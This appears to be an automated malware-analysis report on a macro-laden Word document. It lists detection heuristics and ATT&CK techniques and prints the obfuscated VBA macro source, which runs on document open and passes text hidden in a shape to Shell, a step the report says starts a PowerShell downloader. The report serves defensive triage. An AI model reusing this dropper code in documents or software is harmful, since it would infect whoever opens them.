MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on document open and use the Shell() function to execute a command. This command invokes cmd.exe with a complex set of instructions that ultimately calls PowerShell to download and execute a second-stage payload from a list of embedded URLs. The presence of cmd.exe and PowerShell execution, together with the Shell() call, strongly indicates downloader or dropper functionality.
Heuristics (9)

- ClamAV: Doc.Malware.Dkah-6765077-0 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Malware.Dkah-6765077-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
  Document contains VBA macro code.
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]
  Matched lines in script:
  ZdnBRc = CByte(149723020)
  VNQLZUnr = Array(HfFHwE, Interaction.Shell(lsvBmLwM, FKqlNEDRiHO), zfiFXY)
  On Error Resume Next
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]
  Matched lines in script:
  Attribute VB_Customizable = True
  Private Sub Document_open()
  On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]
- Reference to PowerShell [high, SC_STR_POWERSHELL]
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5493 bytes |

SHA-256: 434fdb9e79053dab9b439dace7a11c6d57697fe2e3b3bff58fd39c55aa84bc89

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 127 of 187 identifiers look randomly generated (e.g. 'JKScrnbpN'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "KdJhHpwIH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
YwjwBv = Atn(LLtQZQow)
ovWijuz = CLng(suKqr)
lLDfDCwB = Cos(QFhMtfhw)
NpiadTi = CByte(zbDGkpU)
IFWkktdn = CByte(38106911)
dwhFc = CBool(72932148)
icBwKhjAZ = WzijP
jlaLMr = 131470088
vUXpjw = CByte(286608830)
On Error Resume Next
buvXwsXKF = Atn(hHMsQiZ)
kzvMpDjw = CLng(KLclvrM)
ZhqYMC = Cos(wSPfqj)
zGUVAC = CByte(FrqARN)
crmQAZqBi = CByte(76103914)
ubPXoAI = CBool(305646267)
NWQarKCUp = YupUU
dPpGVwX = 59571181
GaAiDqrXO = CByte(246694552)
On Error Resume Next
snSosMTH = Atn(JdZYjoB)
XKYknMU = CLng(bdhbrzB)
ziEQs = Cos(dmQDXOEz)
FRkMpuDEa = CByte(JRjljmJbQ)
Ekkiijm = CByte(129721883)
oGadmcJG = CBool(261593598)
PvZdTi = uAkQOno
mUhGdJH = 237776620
mrjowJX = CByte(211238779)
Set MZpXWMi = Shapes("GNrYjbmJk")
On Error Resume Next
zkrNTMbV = Atn(sCiKc)
ZoTzUYICb = CLng(sCjORhcJ)
ZipTp = Cos(kNQVpW)
aMupc = CByte(ZJohPc)
JsGkLZZ = CByte(40605060)
NjUih = CBool(237891263)
shmPkb = UcEIkuk
arOIrGjJP = 319295029
XzLUw = CByte(255942528)
On Error Resume Next
zGrEj = Atn(sjOws)
bGtJdzcA = CLng(wuNiS)
zrzWko = Cos(ZMpAnHP)
GwEEWql = CByte(zWrWAB)
daQpus = CByte(110584654)
IvFhhTc = CBool(73030503)
lfpwJZv = McAAsRU
AMaXSVd = 277085773
vJQJEuU = CByte(75398708)
On Error Resume Next
UkaYG = Atn(cXhvu)
SEihKlKhP = CLng(zsEGnpPGj)
BtOOJPPL = Cos(zXqwKHi)
nzhYH = CByte(WkiTzTnHb)
MsYpPX = CByte(307091436)
wHRaJtu = CBool(337890885)
ibIzI = CsibvPsmp
cmRjprPCL = 172253017
ZwbpZAKEf = CByte(120336260)
lsvBmLwM = MZpXWMi.TextFrame.ContainingRange
On Error Resume Next
pUkaijlc = Atn(UmTVTXK)
vuiEOM = CLng(TdIwXIowW)
aVFJjMto = Cos(WfYCRHor)
tbbbHqHFb = CByte(ENjozotB)
IOipP = CByte(208834985)
OuarqjQoF = CBool(307691216)
wOOCb = GjVqqaOY
jjlKm = 79775784
RcMijwVwr = CByte(233374617)
On Error Resume Next
SXTVSMsF = Atn(pGZhlluw)
wzPclDco = CLng(YjkzMlu)
RDJhAr = Cos(oMtNjoNk)
vDZXplPt = CByte(mTWAqto)
XUqpCwGd = CByte(267770879)
KPHlLwD = CBool(26562264)
LXXfn = DNXPnW
YtQtursHT = 300998937
MFiXA = CByte(52561296)
On Error Resume Next
NkwkQ = Atn(VzVSIjd)
OXjJv = CLng(AXpaKAO)
IKohXAC = Cos(imlzTwsoo)
HWnzAVvuI = CByte(uVZQQvpLd)
LdHOtuX = CByte(333062911)
DiAmQ = CBool(295056850)
nIJSmcrLF = MVhYH
LNidPZGF = 333632127
tEMtiJXXH = CByte(215143611)
On Error Resume Next
ouoqqEQq = Atn(ZSlAPwipR)
EFhFN = CLng(ijwdkz)
JKScrnbpN = Cos(QiNzR)
woavQKiHp = CByte(YMXTNLb)
bpwTnCp = CByte(107438510)
zQazTNqAo = CBool(64312544)
bwcKn = OPRtuE
nXbtc = 6339277
GzUkrPc = CByte(33945860)
Const FKqlNEDRiHO = 0
On Error Resume Next
tdzqzzzzz = Atn(iEIMWS)
AiXKwhjX = CLng(TilGP)
oOXwhKZ = Cos(sVRKsrWEm)
PJtlkuwRT = CByte(jUMrvDQt)
Zkibjioj = CByte(149707879)
fnOspqGi = CBool(18666129)
cAQrkSX = aPpbc
MKliJG = 314387759
ZdnBRc = CByte(149723020)
VNQLZUnr = Array(HfFHwE, Interaction.Shell(lsvBmLwM, FKqlNEDRiHO), zfiFXY)
On Error Resume Next
fDQwjkDj = Atn(vVDdLQw)
PLDzPQ = CLng(XipuUzjYF)
kAOTUNzs = Cos(qitzZMi)
EkLoP = CByte(XZzvJMcO)
zqaQjrvwF = CByte(47400500)
aPilQhlq = CBool(186912000)
uzUOruWS = fCbhwGwv
RJlFhfLHu = 81084016
bammICs = CByte(40222307)
On Error Resume Next
fwRFIHVr = Atn(wufIWwiG)
JPibmXdl = CLng(rtXED)
lRUQsqZN = Cos(jNwAYH)
TpCfqzDKu = CByte(WHdwJtr)
XFbNNwjCQ = CByte(294413800)
YdNszZi = CBool(14518439)
wnNKWQU = jTZUHJ
CSGbD = 310325948
jLlVwJOj = CByte(162198152)
On Error Resume Next
CFUtpid = Atn(srfTNQCV)
cCvicEd = CLng(zoWKsvn)
fApdjz = Cos(nWJXwFPF)
WEbcBtZA = CByte(TptGizvsG)
PMrrdSHI = CByte(129789894)
iTkjponU = CBool(69962047)
laonPJ = hrJcGzhpU
NzJtlGT = 80808355
FKRqLahtw = CByte(274157749)
End Sub